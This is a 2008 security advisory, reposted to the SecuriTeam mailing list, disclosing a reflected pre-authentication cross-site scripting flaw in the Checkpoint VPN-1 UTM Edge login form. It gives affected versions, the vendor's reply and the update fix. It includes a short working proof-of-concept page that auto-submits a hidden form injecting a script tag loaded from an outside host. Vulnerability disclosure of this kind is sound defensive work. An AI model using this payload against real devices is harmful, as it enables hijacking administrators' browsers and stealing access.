[NEWS] Checkpoint VPN-1 UTM Edge Cross Site Scripting

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Checkpoint VPN-1 UTM Edge Cross Site Scripting
------------------------------------------------------------------------


SUMMARY

<http://www.checkpoint.com/> VPN-1 UTM Edge appliances "deliver unified
threat management to enterprises with branch offices and simplify security
deployments and manageability. VPN-1 UTM Edge appliances consolidate
proven enterprise-class technology into a single branch office solution
that does not compromise the corporate network and eliminates the branch
office as your weakest link. As part of Check Point's Unified Security
Architecture, VPN-1 UTM Edge can enforce a global security policy and
allows administrators to manage and update thousands of appliances as
easily as managing one."

Insufficient input validation and output encoding on the login page allows
attacker to perform html-injection by posting suitable string to the login
form handler. The injection leads to reflected pre-authentication cross
site scripting.

DETAILS

Vulnerable Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.0.48x

Immune Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.5.48

Form based authentication is used only when device is accessed using HTTP.
Authentication over HTTPS uses HTTP basic authentication.

The device does not accept the parameters in a GET request, POST request
has to be used instead - exploiting the XSS vulnerability requires
therefore a bit more effort compared to ordinary GET based reflected cross
site scripting vulnerability.

The current version can be checked from
http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is LAN IP
address of the device. The page also displays current product key.

Vendor response:
"Once users register the appliance and connect to the service center
(Safe@Office appliances), the latest firmware is automatically downloaded
to their appliance. For UTM-1 Edge appliances, the latest firmware version
can be downloaded from the Check Point download center. Currently, this is
version 7.5.48 that does not contain the reported issue. We believe that
customers are not exposed to this issue."

Proof of Concept:
<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1";
style="display:none">

<input name="user" value="'<script/src=//l7.fi></script>">

</form>
</body>
</html>

Solution:
Update to version 7.5.48

Disclosure Timeline:
19. February 2008 - Contacted Checkpoint by email
20. February 2008 - Vendor response.
6. March 2008 - Advisory was released


ADDITIONAL INFORMATION

The information has been provided by <mailto:henri.lindberg@xxxxxxxx>
Henri Lindberg.
The original article can be found at:
<http://www.louhi.fi/advisory/checkpoint_080306.txt>
http://www.louhi.fi/advisory/checkpoint_080306.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages